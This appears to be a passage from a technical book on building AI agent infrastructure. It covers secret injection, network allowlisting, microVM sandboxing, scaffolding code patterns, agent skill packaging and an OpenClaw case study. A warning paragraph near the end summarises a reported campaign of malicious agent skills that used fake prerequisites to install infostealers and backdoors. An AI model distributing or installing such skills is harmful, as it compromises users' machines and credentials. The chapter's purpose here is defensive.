api_key = os.environ.get('API_KEY')
# If agent code is compromised, api_key is directly accessible

Sealed secrets use encryption and access control systems like Kubernetes secrets or HashiCorp Vault to protect credentials at rest and in transit. Secrets are decrypted only when needed and only by authorized agents. This prevents static credential exposure but still requires the decrypted secret to exist in the agent’s memory space. Use this when you need better protection than environment variables but can accept in-memory credential presence.

# Better: fetch secrets from secure store
from vault_client import VaultClient

vault = VaultClient(token=os.environ.get('VAULT_TOKEN'))
api_key = vault.get_secret('api_keys/openai')
# Secret is encrypted until fetched, but still in memory

Network-layer injection provides the strongest protection by keeping credentials entirely outside the agent execution environment. A transparent proxy intercepts outbound API calls from the agent and injects real credentials at the network layer. The agent sees and uses a placeholder token, but actual API calls work seamlessly because the proxy rewrites requests in flight. If the agent is compromised, the attacker only obtains the placeholder, which is useless outside the sandboxed environment.

# Most secure: agent never sees real credentials
api_key = "placeholder_token_12345"  # Not the real secret
client = OpenAI(api_key=api_key)

# Proxy intercepts this request:
# - Sees placeholder token in Authorization header
# - Replaces it with real credential
# - Forwards to actual API endpoint
# - Returns response to agent
response = client.chat.completions.create(...)

This pattern requires infrastructure support—a MITM proxy with vsock or similar communication channel—but provides defense in depth. Even if agent code is fully compromised, credentials remain protected. Use this for high-security environments or when executing untrusted agent code.

Secret rotation is essential regardless of injection method. Credentials should expire and rotate regularly, limiting the window of exposure if a secret is compromised. Automated rotation with short-lived tokens (hours to days rather than months) reduces risk without requiring manual intervention.

Network Security for Agent Workflows

Unrestricted network access allows agents to exfiltrate data, call arbitrary APIs, or participate in distributed attacks. Default-deny networking with explicit allowlisting provides control without breaking legitimate functionality.

Default-deny networking blocks all outbound connections unless explicitly permitted. This prevents agents from reaching unexpected endpoints. Implement this at the firewall, container network policy, or virtual network level. Agents can only call services you have explicitly authorized.

Explicit allowlisting per host defines which external services each agent workflow can access. A code review agent might need GitHub API and language model APIs, but not database access. A documentation agent might need only static site generators and file storage. Granular policies limit blast radius when agents behave unexpectedly.

# Example network policy for agent workspace
agent_policies:
  code_review_agent:
    allowed_hosts:
      - api.github.com
      - api.openai.com
      - api.anthropic.com
    blocked_hosts:
      - internal-database.corp
      - admin-panel.corp

  documentation_agent:
    allowed_hosts:
      - api.openai.com
      - storage.googleapis.com
    blocked_hosts:
      - "*"  # default deny

Egress filtering logs and monitors agent network activity, providing visibility into what agents actually do. Even with allowlisting, tracking connection attempts helps detect anomalies. If an agent suddenly attempts connections to unexpected hosts, this indicates potential compromise or unintended behavior.

Monitoring and logging complement filtering by recording which APIs agents call, how often, and with what results. This telemetry helps debug agent behavior and detect security issues early. Pattern-based alerting can flag unusual activity for human review.

Case Study: MicroVM-Based Sandboxing

To make these patterns concrete, consider Matchlock (https://github.com/jingkaihe/matchlock), an open-source CLI tool that combines microVMs with transparent secret injection. Matchlock has matured since its February 2026 debut, shipping Go and Python SDKs for embedding sandboxes directly in applications, and gaining community recognition as a developer-first, cross-platform option for agent sandboxing.

Problem addressed: Agent workflows need to execute potentially untrusted code while calling authenticated APIs. Traditional approaches either expose credentials to the agent (security risk) or require complex credential management (operational burden).

Solution architecture: Matchlock runs agents in ephemeral Firecracker microVMs (Linux) or Virtualization.framework (macOS) with:

Disposable filesystems: Each agent run gets a fresh copy-on-write filesystem that disappears after execution, preventing persistence of malicious code or leaked data
Transparent MITM proxy: A host-side proxy intercepts agent API calls, sees placeholder tokens in request headers, and injects real credentials before forwarding to actual endpoints
Vsock communication: Guest-host communication uses vsock (virtual socket) rather than TCP, reducing attack surface
Network allowlisting: Only explicitly permitted hosts are reachable from the VM
Sub-second boot: MicroVMs start in under one second, making sandboxing practical for iterative development workflows

The agent code looks normal—it imports libraries, reads a placeholder API key, and makes API calls. But the execution environment ensures credentials never enter the VM and network access is tightly controlled.

# Agent code running inside Matchlock microVM
import openai

# This is a placeholder token, not the real credential
client = openai.OpenAI(api_key="matchlock_placeholder")

# Proxy intercepts this call and injects the real API key
response = client.chat.completions.create(
    model="gpt-4",
    messages=[{"role": "user", "content": "Hello"}]
)
# Agent receives response as if it had used real credentials
print(response.choices[0].message.content)

Comparison with alternatives:

Docker + seccomp/AppArmor: Simpler to deploy but weaker isolation (shared kernel). Suitable when agent code is mostly trusted or security requirements are moderate.
gVisor: Application kernel providing stronger isolation than containers without full VMs. More complex than Docker but lighter than microVMs. Good middle ground for medium-security needs.
Microsandbox: Open-source sandboxing tool (https://github.com/zerocore-ai/microsandbox) powered by libkrun for lightweight microVM isolation, with boot times under 200 ms. Microsandbox is MCP-ready and self-hosted, positioning it as a “self-hosted E2B” option for teams that need the isolation primitive without managed infrastructure.
Full VMs (QEMU, VirtualBox): Strongest isolation but slower boot times (30+ seconds). Use when security requirements justify the latency cost, such as for long-running batch jobs with untrusted code.

When to use each approach:

Use containers (Docker, Podman) for trusted agent code in controlled environments where convenience and ecosystem maturity matter. Use microVMs (Firecracker, Matchlock) when you need strong isolation without sacrificing rapid iteration, especially for executing user-provided or LLM-generated code. Use full VMs when security requirements are paramount and boot time is less critical, such as for isolated compliance workloads. Use process-level isolation only for prototyping or fully trusted code where security is not a concern.

The architecture of transparent proxying plus ephemeral environments provides a reference pattern for high-security agent scaffolding, applicable beyond any specific tool implementation.

Communication Protocol

Standardize how agents communicate.

interface AgentMessage {
  id: string;
  sender: string;
  recipient: string;
  type: 'task' | 'result' | 'error' | 'query';
  payload: any;
  timestamp: Date;
  metadata?: Record<string, any>;
}

class MessageBus {
  async send(message: AgentMessage): Promise<void> {
    // Route message to recipient
  }
  
  async subscribe(agentId: string, handler: MessageHandler): Promise<void> {
    // Subscribe agent to messages
  }
}

Scaffolding Patterns

Pattern 1: Tool Composition

Enable agents to combine tools effectively.

class ComposableTool:
    """Base class for composable tools"""
    
    def __init__(self, name, func, inputs, outputs):
        self.name = name
        self.func = func
        self.inputs = inputs
        self.outputs = outputs
    
    def compose_with(self, other_tool):
        """Compose this tool with another"""
        if self.outputs & other_tool.inputs:
            return CompositeTool([self, other_tool])
        raise ValueError("Tools cannot be composed - incompatible inputs/outputs")
    
    def execute(self, **kwargs):
        return self.func(**kwargs)

# Usage
read_file = ComposableTool('read_file', read_func, set(), {'content'})
analyze_code = ComposableTool('analyze', analyze_func, {'content'}, {'issues'})
pipeline = read_file.compose_with(analyze_code)

Pattern 2: Skill Libraries

Organize reusable agent capabilities.

# skills/code_review.py
class CodeReviewSkill:
    """Skill for reviewing code changes"""
    
    def __init__(self, llm):
        self.llm = llm
        self.tools = ['git_diff', 'static_analysis', 'test_runner']
    
    async def review_pull_request(self, pr_number):
        """Review a pull request"""
        diff = await self.get_diff(pr_number)
        issues = await self.analyze(diff)
        tests = await self.run_tests()
        return self.create_review(issues, tests)
    
    # ... implementation details

# skills/__init__.py
from .code_review import CodeReviewSkill
from .documentation import DocumentationSkill
from .testing import TestingSkill

__all__ = ['CodeReviewSkill', 'DocumentationSkill', 'TestingSkill']

Pattern 3: Resource Management

Manage computational resources efficiently.

class ResourceManager:
    """Manages resources for agent execution"""
    
    def __init__(self, max_concurrent=5, timeout=300):
        self.max_concurrent = max_concurrent
        self.timeout = timeout
        self.active_agents = {}
        self.semaphore = asyncio.Semaphore(max_concurrent)
    
    async def execute_agent(self, agent_id, task):
        """Execute agent with resource limits"""
        async with self.semaphore:
            try:
                async with timeout(self.timeout):
                    result = await self._run_agent(agent_id, task)
                return result
            except asyncio.TimeoutError:
                self._cleanup_agent(agent_id)
                raise AgentTimeoutError(f"Agent {agent_id} timed out")

Pattern 4: Observability

Monitor and debug agent behavior.

class AgentObserver:
    """Observes and logs agent behavior"""
    
    def __init__(self):
        self.logger = logging.getLogger('agent_observer')
        self.metrics = {}
    
    def log_execution(self, agent_id, task, result, duration):
        """Log agent execution"""
        self.logger.info(f"Agent {agent_id} executed {task} in {duration}s")
        self._update_metrics(agent_id, duration, result.success)
    
    def get_metrics(self, agent_id):
        """Get performance metrics"""
        return self.metrics.get(agent_id, {})
    
    def export_trace(self, agent_id):
        """Export execution trace for debugging"""
        return self._build_trace(agent_id)

Building Scaffolding: Step by Step

Step 1: Define Your Agent Ecosystem

# agent_config.yaml
agents:
  content_writer:
    type: specialized
    tools: [markdown_editor, research_tool]
    max_execution_time: 600
    
  code_reviewer:
    type: specialized
    tools: [git, static_analyzer, test_runner]
    max_execution_time: 300
    
  orchestrator:
    type: coordinator
    tools: [task_queue, notification_service]
    manages: [content_writer, code_reviewer]

Step 2: Implement Tool Registry

Centralize tool access and management.

Step 3: Create Agent Templates

Provide starting points for common agent types.

# templates/base_agent.py
class BaseAgent(ABC):
    """Base template for all agents"""
    
    def __init__(self, agent_id, config):
        self.agent_id = agent_id
        self.config = config
        self.tools = self._load_tools()
        self.context = AgentContext()
    
    @abstractmethod
    async def execute(self, task):
        """Execute the agent's main task"""
        pass
    
    def _load_tools(self):
        """Load tools from registry"""
        return [get_tool(name) for name in self.config['tools']]

Step 4: Implement Error Recovery

Build resilience into your scaffolding.

class ResilientAgent:
    """Agent with built-in error recovery"""
    
    async def execute_with_recovery(self, task, max_retries=3):
        """Execute with automatic retry on failure"""
        for attempt in range(max_retries):
            try:
                result = await self.execute(task)
                return result
            except RecoverableError as e:
                if attempt < max_retries - 1:
                    await self._recover(e)
                    continue
                raise
            except Exception as e:
                self._log_error(e)
                raise

Warning: Sandboxing and permission boundaries are not optional. Treat every tool invocation as a least-privilege request and validate all side effects in a separate review step.

Scaffolding for This Book

This book’s scaffolding includes several interconnected components.

GitHub Actions provides workflow orchestration, triggering agents in response to issues, pull requests, and schedules. Issue Templates provide structured input for suggestions, ensuring agents receive information in a consistent format they can parse reliably. Agent Scripts are Python scripts for content management that handle tasks like generating tables of contents and updating cross-references. Tool Access includes Git for version control, markdown processors for content transformation, and PDF generators for final output. State Management uses the Git repository itself as persistent state, with commits recording the history of changes. Communication flows through the GitHub API, which provides the coordination layer for all agent interactions.

Concrete Repo Components

In this repository, the scaffolding is implemented in concrete files:

Link and integrity checks: scripts/check-links.py
Markdown assembly for PDF: scripts/build-combined-md.sh
GH-AW source workflows: .github/workflows/issue-*.md
Compiled GH-AW lock files: .github/workflows/issue-*.lock.yml
Publishing workflows: .github/workflows/pages.yml and .github/workflows/build-pdf.yml
CI validation: .github/workflows/check-links.yml, .github/workflows/check-external-links.yml, and .github/workflows/compile-workflows.yml
Coding agent environment: .github/workflows/copilot-setup-steps.yml
Lifecycle policy: WORKFLOW_PLAYBOOK.md

For workflow semantics, see GitHub Agentic Workflows (GH-AW). For failure handling and validation strategy, see Common Failure Modes, Testing, and Fixes.

Best Practices

Start Simple. Build minimal scaffolding first and expand only as needed. Over-engineering early creates maintenance burden without corresponding benefit; let actual requirements drive complexity.

Security First. Implement permissions and isolation from the start, not as an afterthought. Retrofitting security into an existing architecture is far more difficult than designing it in from the beginning.

Observability. Log everything—you will need it for debugging. When agents behave unexpectedly, logs are often the only way to reconstruct what happened and why.

Version Control. Version your scaffolding alongside your agents. The two must evolve together, and tracking their relationship helps diagnose regressions.

Documentation. Document tools, APIs, and patterns clearly. Agents rely on this documentation to use scaffolding correctly, and humans need it to maintain the system.

Testing. Test your scaffolding independently of agents. This allows you to verify that infrastructure works correctly before introducing the additional variability of agent behaviour.

Common Pitfalls

Over-engineering. Building scaffolding for hypothetical needs wastes time and creates complexity that obscures the actual architecture. Wait until a requirement is real before addressing it.

Tight Coupling. When agents depend heavily on specific scaffolding details, changes become risky and testing becomes difficult. Keep agents loosely coupled to scaffolding through well-defined interfaces.

Poor Error Handling. Agents encounter failures—network timeouts, API errors, unexpected input. Scaffolding that does not plan for these scenarios will leave agents stuck or produce corrupt output.

No Monitoring. You cannot improve what you cannot measure. Without visibility into how agents use scaffolding, you cannot identify bottlenecks or verify that changes help.

Ignoring Security. Security must be built in, not bolted on. Scaffolding that allows unrestricted tool access or does not validate inputs creates vulnerabilities that grow harder to fix over time.

Key Takeaways

Scaffolding provides the foundation for effective agent operation, enabling capabilities that agents could not achieve in isolation. Core components include tools for interacting with the environment, context for maintaining state across invocations, execution environments for safe isolated operation, and communication protocols for agent coordination. Patterns like tool composition and resource management improve scalability by letting you combine simple pieces into complex capabilities. Build incrementally, focusing on security and observability as primary concerns rather than afterthoughts. Good scaffolding makes agents more capable and easier to manage by providing reliable infrastructure they can depend on.

Skills and Tools Management

Chapter Preview

This chapter defines tools and skills and explains how they map to operational workflows in agentic systems. It compares packaging formats and protocols for distributing skills, helping you choose the right approach for your organisation’s needs. Finally, it walks through safe patterns for skill development and lifecycle management, covering versioning, testing, and deprecation.

Understanding Skills vs. Tools

Tools

Tools are atomic capabilities that agents can use to interact with their environment. They are the building blocks of agent functionality, each performing a single well-defined operation.

Examples of tools include file system operations such as read, write, and delete; API calls including GET, POST, PUT, and DELETE methods; shell commands that execute system operations; and database queries that retrieve or modify stored data.

Skills

Skills are higher-level capabilities composed of multiple tools and logic. They represent complex behaviours that agents can learn and apply, combining atomic operations into coherent workflows.

Examples of skills include code review, which uses Git for diffs, static analysis for issue detection, and test execution for validation. Documentation writing is another skill, combining research tools to gather information, markdown editing tools to write content, and validation tools to check correctness. Bug fixing is a skill that combines debugging tools to identify causes, testing tools to verify fixes, and code editing tools to implement changes.

Tool Design Principles

Single Responsibility

Each tool should do one thing well.

# Good: Focused tool
class FileReader:
    """Reads content from files"""
    
    def read(self, filepath: str) -> str:
        with open(filepath, 'r') as f:
            return f.read()

# Bad: Tool doing too much
class FileManager:
    """Does everything with files"""
    
    def read(self, filepath): ...
    def write(self, filepath, content): ...
    def delete(self, filepath): ...
    def search(self, pattern): ...
    def backup(self, filepath): ...

Clear Interfaces

Tools should have well-defined inputs and outputs.

from typing import Protocol

class Tool(Protocol):
    """Interface for all tools"""
    
    name: str
    description: str
    
    def execute(self, **kwargs) -> dict:
        """Execute the tool with given parameters"""
        ...
    
    def get_schema(self) -> dict:
        """Get JSON schema for tool parameters"""
        ...

Error Handling

Tools must handle errors gracefully and provide useful feedback.

class WebScraperTool:
    """Tool for scraping web content"""
    
    def execute(self, url: str, timeout: int = 30) -> dict:
        try:
            response = requests.get(url, timeout=timeout)
            response.raise_for_status()
            return {
                'success': True,
                'content': response.text,
                'status_code': response.status_code
            }
        except requests.Timeout:
            return {
                'success': False,
                'error': 'Request timed out',
                'error_type': 'timeout'
            }
        except requests.RequestException as e:
            return {
                'success': False,
                'error': str(e),
                'error_type': 'request_error'
            }

Documentation

Every tool needs clear documentation.

class GitDiffTool:
    """
    Tool for getting git diffs.
    
    Capabilities:
        - Get diff for specific files
        - Get diff between commits
        - Get diff for staged changes
    
    Parameters:
        filepath (str, optional): Specific file to diff
        commit1 (str, optional): First commit hash
        commit2 (str, optional): Second commit hash
        staged (bool): Whether to show staged changes only
    
    Returns:
        dict: Contains 'diff' (str) and 'files_changed' (list)
    
    Example:
        >>> tool = GitDiffTool()
        >>> result = tool.execute(staged=True)
        >>> print(result['diff'])
    """
    
    def execute(self, **kwargs) -> dict:
        # Implementation
        pass

Creating Custom Tools

Basic Tool Template

from typing import Any, Dict
import json

class CustomTool:
    """Template for creating custom tools"""
    
    def __init__(self, name: str, description: str):
        self.name = name
        self.description = description
    
    def execute(self, **kwargs) -> Dict[str, Any]:
        """
        Execute the tool.
        
        Override this method in your tool implementation.
        """
        raise NotImplementedError("Tool must implement execute method")
    
    def validate_params(self, **kwargs) -> bool:
        """
        Validate tool parameters.
        
        Override for custom validation logic.
        """
        return True
    
    def get_schema(self) -> Dict[str, Any]:
        """
        Return JSON schema for tool parameters.
        """
        return {
            'name': self.name,
            'description': self.description,
            'parameters': {}
        }

Example: Markdown Validation Tool

import re
from typing import Dict, Any, List

class MarkdownValidatorTool:
    """Validates markdown content for common issues"""
    
    def __init__(self):
        self.name = "markdown_validator"
        self.description = "Validates markdown files for common issues"
    
    def execute(self, content: str) -> Dict[str, Any]:
        """Validate markdown content"""
        issues = []
        
        # Check for broken links
        issues.extend(self._check_links(content))
        
        # Check for heading hierarchy
        issues.extend(self._check_headings(content))
        
        # Check for code block formatting
        issues.extend(self._check_code_blocks(content))
        
        return {
            'valid': len(issues) == 0,
            'issues': issues,
            'issue_count': len(issues)
        }
    
    def _check_links(self, content: str) -> List[Dict]:
        """Check for broken or malformed links"""
        issues = []
        links = re.findall(r'\[([^\]]+)\]\(([^\)]+)\)', content)
        
        for text, url in links:
            if not url:
                issues.append({
                    'type': 'broken_link',
                    'message': f'Empty URL in link: [{text}]()',
                    'severity': 'error'
                })
        
        return issues
    
    def _check_headings(self, content: str) -> List[Dict]:
        """Check heading hierarchy"""
        issues = []
        lines = content.split('\n')
        prev_level = 0
        
        for i, line in enumerate(lines):
            if line.startswith('#'):
                level = len(line) - len(line.lstrip('#'))
                if level > prev_level + 1:
                    issues.append({
                        'type': 'heading_skip',
                        'message': f'Heading level skipped at line {i+1}',
                        'severity': 'warning'
                    })
                prev_level = level
        
        return issues
    
    def _check_code_blocks(self, content: str) -> List[Dict]:
        """Check code block formatting"""
        issues = []
        backticks = re.findall(r'```', content)
        
        if len(backticks) % 2 != 0:
            issues.append({
                'type': 'unclosed_code_block',
                'message': 'Unclosed code block detected',
                'severity': 'error'
            })
        
        return issues

Agent Skills Standard (Primary Reference)

For practical interoperability, treat Agent Skills as the primary standard today. The authoritative docs are:

Overview and motivation: https://agentskills.io/home
Core concept page: https://agentskills.io/what-are-skills
Full format specification: https://agentskills.io/specification
Integration guidance: https://agentskills.io/integrate-skills

The current ecosystem signal is strongest around this filesystem-first model: a SKILL.md contract with progressive disclosure, plus optional scripts/, references/, and assets/ directories.

Placement note: For OpenAI Codex auto-discovery, store repository skills under .agents/skills/ (or user-level ~/.codex/skills/). A plain top-level skills/ folder is a useful wrapper convention but is not auto-discovered by default without additional wiring.

Canonical Layout

Example 4-1. .agents/skills/code-review/

.agents/
  skills/
    code-review/
      SKILL.md
      manifest.json
      scripts/
        review.py
      references/
        rubric.md
      assets/
        example-diff.txt

Example 4-2. .agents/skills/code-review/SKILL.md

---
name: code-review
description: Review pull requests for security, correctness, and clarity.
compatibility: Requires git and Python 3.11+
allowed-tools: Bash(git:*) Read
metadata:
  author: engineering-platform
  version: "1.2"
---

# Code Review Skill

## When to use
Use this skill when reviewing pull requests for correctness, security, and clarity.

## Workflow
1. Run `scripts/review.py --pr <number>`.
2. If policy checks fail, consult `references/rubric.md`.
3. Return findings grouped by severity and file.

Tip: Keep SKILL.md concise and front-load decision-critical instructions. Put deep references in references/ and executable logic in scripts/ so agents load content only when needed.

Conformance Notes: Agent Skills vs. JSON-RPC Runtime Specs

The main discrepancy you will see across docs in the wild is where standardization happens:

Agent Skills standardizes the artifact format (directory + SKILL.md schema + optional folders).
Some alternative specs standardize a remote runtime API (often JSON-RPC-style methods such as list, describe, execute).

In production, the Agent Skills packaging approach currently has clearer multi-tool adoption because it works in both:

Filesystem-based agents (agent can cat and run local scripts).
Tool-based agents (host platform loads and mediates skill content).

JSON-RPC itself is battle-tested in other ecosystems (for example, Language Server Protocol, Ethereum node APIs, and MCP transport patterns), but there are still fewer public, concrete references to large-scale deployments of a dedicated JSON-RPC skills runtime than to plain SKILL.md-based workflows. For most teams, this makes Agent Skills the safest default and JSON-RPC skill runtimes an optional layering.

Relationship to MCP

Use Agent Skills to define and distribute reusable capability packages. Use MCP (Model Context Protocol) to expose tools, data sources, or execution surfaces to models. In mature systems, these combine naturally: Agent Skills provide the instructions and assets that tell agents how to accomplish tasks, while MCP provides controlled runtime tool access that actually executes operations. The two standards complement each other rather than competing.

Skill Development

Skill Architecture

from typing import List, Dict, Any
from abc import ABC, abstractmethod

class Skill(ABC):
    """Base class for agent skills"""
    
    def __init__(self, name: str, tools: List[Tool]):
        self.name = name
        self.tools = {tool.name: tool for tool in tools}
    
    @abstractmethod
    async def execute(self, task: Dict[str, Any]) -> Dict[str, Any]:
        """Execute the skill"""
        pass
    
    def get_tool(self, name: str) -> Tool:
        """Get a tool by name"""
        return self.tools[name]
    
    def has_tool(self, name: str) -> bool:
        """Check if skill has a tool"""
        return name in self.tools

Example: Code Review Skill

class CodeReviewSkill(Skill):
    """Skill for reviewing code changes"""
    
    def __init__(self, llm, tools: List[Tool]):
        super().__init__("code_review", tools)
        self.llm = llm
    
    async def execute(self, task: Dict[str, Any]) -> Dict[str, Any]:
        """
        Execute code review.
        
        Task should contain:
            - pr_number: Pull request number
            - focus_areas: List of areas to focus on (optional)
        """
        pr_number = task['pr_number']
        focus_areas = task.get('focus_areas', ['bugs', 'security', 'performance'])
        
        # Step 1: Get code changes
        git_diff = self.get_tool('git_diff')
        diff_result = git_diff.execute(pr_number=pr_number)
        
        if not diff_result['success']:
            return {'success': False, 'error': 'Failed to get diff'}
        
        # Step 2: Run static analysis
        analyzer = self.get_tool('static_analyzer')
        analysis_result = analyzer.execute(
            diff=diff_result['diff'],
            focus=focus_areas
        )
        
        # Step 3: Run tests
        test_runner = self.get_tool('test_runner')
        test_result = test_runner.execute()
        
        # Step 4: Generate review using LLM
        review = await self._generate_review(
            diff_result['diff'],
            analysis_result['issues'],
            test_result
        )
        
        return {
            'success': True,
            'review': review,
            'static_analysis': analysis_result,
            'test_results': test_result
        }
    
    async def _generate_review(self, diff, issues, tests):
        """Generate review using LLM"""
        prompt = f"""
        Review the following code changes:
        
        {diff}
        
        Static analysis found these issues:
        {json.dumps(issues, indent=2)}
        
        Test results:
        {json.dumps(tests, indent=2)}
        
        Provide a comprehensive code review.
        """
        
        return await self.llm.generate(prompt)

Importing and Using Skills

Skill Registry

class SkillRegistry:
    """Central registry for skills"""
    
    def __init__(self):
        self._skills = {}
    
    def register(self, skill: Skill):
        """Register a skill"""
        self._skills[skill.name] = skill
    
    def get(self, name: str) -> Skill:
        """Get a skill by name"""
        if name not in self._skills:
            raise ValueError(f"Skill '{name}' not found")
        return self._skills[name]
    
    def list_skills(self) -> List[str]:
        """List all registered skills"""
        return list(self._skills.keys())
    
    def import_skill(self, module_path: str, skill_class: str):
        """Dynamically import and register a skill"""
        import importlib
        
        module = importlib.import_module(module_path)
        SkillClass = getattr(module, skill_class)
        
        # Instantiate and register
        skill = SkillClass()
        self.register(skill)

# Usage
registry = SkillRegistry()

# Register built-in skills
registry.register(CodeReviewSkill(llm, tools))
registry.register(DocumentationSkill(llm, tools))

# Import external skill
registry.import_skill('external_skills.testing', 'TestGenerationSkill')

# Use a skill
code_review = registry.get('code_review')
result = await code_review.execute({'pr_number': 123})

Skill Composition

class CompositeSkill(Skill):
    """Skill composed of multiple sub-skills"""
    
    def __init__(self, name: str, skills: List[Skill]):
        self.name = name
        self.skills = {skill.name: skill for skill in skills}
        
        # Aggregate tools from all skills
        all_tools = []
        for skill in skills:
            all_tools.extend(skill.tools.values())
        
        super().__init__(name, list(set(all_tools)))
    
    async def execute(self, task: Dict[str, Any]) -> Dict[str, Any]:
        """Execute composed skill"""
        results = {}
        
        for skill_name, skill in self.skills.items():
            result = await skill.execute(task)
            results[skill_name] = result
        
        return {
            'success': all(r.get('success', False) for r in results.values()),
            'results': results
        }

# Create composite skill
full_review = CompositeSkill('full_review', [
    CodeReviewSkill(llm, tools),
    SecurityAuditSkill(llm, tools),
    PerformanceAnalysisSkill(llm, tools)
])

Tool Discovery and Documentation

Self-Documenting Tools

class DocumentedTool:
    """Tool with built-in documentation"""
    
    def __init__(self):
        self.name = "example_tool"
        self.description = "Example tool with documentation"
        self.parameters = {
            'required': ['param1'],
            'optional': ['param2', 'param3'],
            'schema': {
                'param1': {'type': 'string', 'description': 'Required parameter'},
                'param2': {'type': 'int', 'description': 'Optional parameter'},
                'param3': {'type': 'bool', 'description': 'Flag parameter'}
            }
        }
        self.examples = [
            {
                'input': {'param1': 'value'},
                'output': {'success': True, 'result': 'output'}
            }
        ]
    
    def get_documentation(self) -> str:
        """Generate documentation for this tool"""
        doc = f"# {self.name}\n\n"
        doc += f"{self.description}\n\n"
        doc += "## Parameters\n\n"
        
        for param, schema in self.parameters['schema'].items():
            required = "Required" if param in self.parameters['required'] else "Optional"
            doc += f"- `{param}` ({schema['type']}, {required}): {schema['description']}\n"
        
        doc += "\n## Examples\n\n"
        for i, example in enumerate(self.examples, 1):
            doc += f"### Example {i}\n\n"
            doc += f"Input: `{json.dumps(example['input'])}`\n\n"
            doc += f"Output: `{json.dumps(example['output'])}`\n\n"
        
        return doc

Integrations: Connecting Tools to Real-World Surfaces

Integrations sit above tools and skills. They represent packaged connectors to real systems (chat apps, device surfaces, data sources, or automation backends) that deliver a coherent user experience. Think of them as the distribution layer for tools and skills: they bundle auth, event routing, permissions, and UX entry points.

How integrations relate to tools and skills:

Tools are atomic actions (send a message, fetch a calendar event, post to Slack).
Skills orchestrate tools to solve tasks (triage inbox, compile meeting notes, run a daily report).
Integrations wrap tools + skills into deployable connectors with lifecycle management (pairing, secrets, rate limits, onboarding, and UI hooks).

In practice, a single integration might expose multiple tools and enable multiple skills. The integration is the bridge between agent capabilities and the messy realities of authentication, permissions, and channel-specific constraints.

Case Study: OpenClaw and pi-mono

OpenClaw (https://openclaw.ai/, https://github.com/openclaw/openclaw) is an open-source, local-first personal AI assistant that runs a gateway control plane and connects to over 50 chat providers and device surfaces. Originally published in November 2025 as Clawdbot by Austrian software engineer Peter Steinberger, the project was renamed to OpenClaw in January 2026. With over 183,000 GitHub stars, 3,000+ community-built skills, and 100,000+ active installations, it has become one of the most popular open-source AI projects. OpenClaw emphasizes multi-channel inboxes (“one brain, many channels”), tool access, and skill management inside a user-owned runtime. The v2026.2.6 release (February 2026) added support for Opus 4.6 and GPT-5.3-Codex models, plus a code safety scanner addressing growing security concerns in the skills ecosystem.

OpenClaw is built on the pi-mono ecosystem (https://github.com/badlogic/pi-mono). The pi-mono monorepo provides an agent runtime, tool calling infrastructure, and multi-provider LLM APIs that OpenClaw leverages to keep the assistant portable across models and deployments.

OpenClaw Architecture in Detail

OpenClaw’s architecture consists of several interconnected components:

                                         +---------------------+
       +------------+                    |      Control UI     |
       | WhatsApp   |---(Gateway WS)---> |      (Dashboard)    |
       | Telegram   |                    +---------+-----------+
       | Discord    |---(API/WS/RPC)                  |
       | iMessage   |                          +------v------+
       +------------+                          |   Gateway   |
                                                   |
                                                   |
                                         +----Agent Runtime---+
                                         |   (pi-mono core)   |
                                         +--------------------+
                                           |     |     |    ...
                                       [Skills/Tools] [Plugins/Other Agents]

1. Gateway Control Plane

Central hub orchestrating all user input/output and messaging channels
Exposes a WebSocket server (default: ws://127.0.0.1:18789)
Handles session state, permissions, and authentication
Supports local and mesh/LAN deployment via Tailscale (https://tailscale.com/) or similar

2. Pi Agent Runtime (pi-mono)

Core single-agent execution environment
Maintains long-lived agent state, memory, skills, and tool access
Handles multi-turn conversation, contextual memory, and tool/plugin invocation
Orchestrates external API/model calls (OpenAI, Anthropic, local models via Ollama https://ollama.com/)
Persistent storage (SQLite, Postgres, Redis) for memory and context

3. Multi-Agent Framework

Support for swarms of specialized agents (“nodes”) handling domain-specific automations
Agents coordinate via shared memory and routing protocols managed by the Gateway
Each agent can be sandboxed (Docker/isolation) for security
Developers build custom agents via TypeScript/YAML plugins

4. Extensible Skills/Plugin Ecosystem

Skills expand the agent’s abilities: file automation, web scraping, email, calendar
Plugins are hot-reloadable and built in TypeScript
Community skill marketplace with 3,000+ skills

Key Design Principles

Privacy-First: All state and memory default to local storage—data never leaves the device unless explicitly configured
BYOM (Bring Your Own Model): Seamlessly supports cloud LLMs (Claude Opus 4.5 recommended) and local inference via Ollama
Proactive Behavior: “Heartbeat” feature enables autonomous wake-up and environment monitoring
Persistent Memory: Learns and adapts over long-term interactions
One Brain, Many Channels: A single AI assistant maintains shared context across all 50+ messaging channels simultaneously—message from WhatsApp on your phone, switch to Telegram on your laptop, and the same assistant remembers everything

Warning: Security researchers have flagged local-first AI assistants as a serious attack surface. In February 2026, the situation escalated rapidly. VirusTotal identified 341 malicious ClawHub skills in a campaign codenamed ClawHavoc: 335 skills used fake prerequisites to install Atomic Stealer (AMOS), a macOS/Windows infostealer, while others deployed backdoors and remote access tools. A single user (“hightower6eu”) was responsible for 314 of these malicious skills. Bitdefender found 17% of skills analysed in early February were malicious. Snyk scanned 3,984 skills and found 283 with critical credential-exposure flaws (7.1% mishandling secrets via LLM context windows). Censys reported over 30,000 exposed OpenClaw instances accessible over the internet. Gartner characterised OpenClaw as “an unacceptable cybersecurity liability” and recommended enterprises block it immediately. OpenClaw responded with a VirusTotal partnership for automated scanning (using Gemini 3 Flash for security analysis), the code safety scanner in v2026.2.6, and plans for a comprehensive threat model and public security roadmap. These incidents make OpenClaw’s skills ecosystem the first major case study in agent supply-chain security at scale.

Key takeaways for skills/tools architecture:

Gateway + runtime separation keeps tools and skills consistent while integrations change: the gateway handles channels and routing, while pi-mono-style runtimes handle tool execution.
Integration catalogs (like OpenClaw’s integrations list and skill registry) are a user-facing map of capability. They surface what tools can do and what skills are available without forcing users to understand low-level APIs.
Skills become reusable assets once tied to integrations: a “Slack triage” skill can target different workspaces without changing the underlying tools, as long as the integration provides the same tool contracts.

The Personal AI Ecosystem Beyond OpenClaw

OpenClaw is the largest project in a rapidly growing personal AI assistant category. Several related frameworks share its local-first philosophy while making different architectural trade-offs.

